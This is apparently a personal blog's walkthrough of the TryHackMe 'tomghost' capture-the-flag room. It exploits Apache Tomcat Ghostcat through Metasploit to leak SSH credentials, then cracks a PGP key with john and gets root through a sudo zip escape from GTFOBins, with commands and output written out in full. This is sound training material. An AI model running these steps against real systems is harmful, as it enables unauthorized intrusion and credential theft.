TryHackMe - tomghost - Write Up
Task 1
Task 1.1
>> Compromise this machine and obtain user.txt
Prep:
root@ip-10-10-48-72:~# export ip=10.10.50.105 root@ip-10-10-48-72:~# echo $ip
Enumrate services with nmap
root@ip-10-10-48-72:~# sudo nmap -sSVC -n -O -T4 -A $ip
-sS TCP SYN Connect
-sV Propen open ports to determine services and versions
-sC Runs default scripts
-n No DNS resolution
-O OS Detection
-T4 Speed of scan/ noises it makes (0>5 loudest)
-A aggressive scan
Result
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.30 MAC Address: 02:23:E0:7A:4A:53 (Unknown) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3.13 [...]
There are some interesting ports. - 22 ssh - 53 DNS server running? - 8009 ajp13 - Apache JServ Protocol, binary protocol - 8080 Apache Tomcat Webserver
Opening $ip:8080 in a browser presents us the default Tomcat page. There are some information visible like $CATALINA_HOME/conf/tomcat-users.xml
. Might get handy later.
I looked into metasploit an found something called tomcat_ghostcat
- well, looks familiar.
$ msfconsole msf6 > search ajp # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/http/tomcat_ghostcat 2020-02-20 normal Yes Apache Tomcat AJP File Read
Let us go with it with the following msf
commands:
msf6 > use 0 msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.50.105 RHOSTS => 10.10.50.105 msf6 auxiliary(admin/http/tomcat_ghostcat) > run
Result
[*] Running module against 10.10.50.105 [...] <description> Welcome to GhostCat skyfuck:***************** </description> </web-app>
Some credentials! Let's try to log into SSH!
root@ip-10-10-48-72:~# ssh skyfuck@$ip [...] skyfuck@ubuntu:~$ ls credential.pgp tryhackme.asc skyfuck@ubuntu:~$
And we don't have to look far. A private key and something to decrypt.
Get the files to the main machine with scp
:
scp skyfuck@$ip:/home/skyfuck/* .
(send from the attacking machine)
Creating a hash of the key with gpg2john
and cracking it with the john
.
root@ip-10-10-48-72:~# gpg2john tryhackme.asc > hashofkey File tryhackme.asc root@ip-10-10-48-72:~# cat hashofkey tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <stuxnet@tryhackme.com>::tryhackme.asc
root@ip-10-10-48-72:~# john --wordlist=/usr/share/wordlists/rockyou.txt hashofkey [...] Press 'q' or Ctrl-C to abort, almost any other key for status ********** (tryhackme) 1g 0:00:00:00 DONE (2024-02-20 17:16) 5.882g/s 6305p/s 6305c/s 6305C/s chinita..alexandru Use the "--show" option to display all of the cracked passwords reliably Session completed.
Let us decrypt the file credential.pgp
root@ip-10-10-48-72:~# gpg --import tryhackme.asc gpg: /root/.gnupg/trustdb.gpg: trustdb created gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported gpg: key 8F3DA3DEC6707170: secret key imported gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed gpg: Total number processed: 2 gpg: imported: 1 gpg: unchanged: 1 gpg: secret keys read: 1 gpg: secret keys imported: 1 root@ip-10-10-48-72:~# gpg --decrypt credential.pgp gpg: WARNING: cypher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11 "tryhackme <stuxnet@tryhackme.com>" merlin:*****************************************************************
And more credentials - SSH yet again.
root@ip-10-10-48-72:~# ssh merlin@$ip merlin@10.10.50.105's password: [...] merlin@ubuntu:~$ ls user.txt merlin@ubuntu:~$ cat user.txt ***{*****************}
Task 1.2
>> Escalate privileges and obtain root.txt
Let us check what we can do:
merlin@ubuntu:~$ sudo -l Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip merlin@ubuntu:~$
Let's hop over to https://gtfobins.github.io and see what we can do with zip
.
Some 'brute-forcing' later and I got in with:
merlin@ubuntu:~$ TF=$(mktemp -u) merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%) # whoami root
Getting the flag.
# cd /root/ # ls root.txt ufw # cat ./root.txt ***{*********}
E-Mail
hello
- 04.02.2024 Adding a trash can to Linux with trash-cli
- 20.01.2024 Bandwidth Measurement using netcat on Linux
- 14.01.2024 Getting started with rsync - Comprehensive Guide
- 10.01.2024 Cron Jobs on Linux - Comprehensive Guide with Examples
- 22.11.2023 SSH Server Hardening Guide v2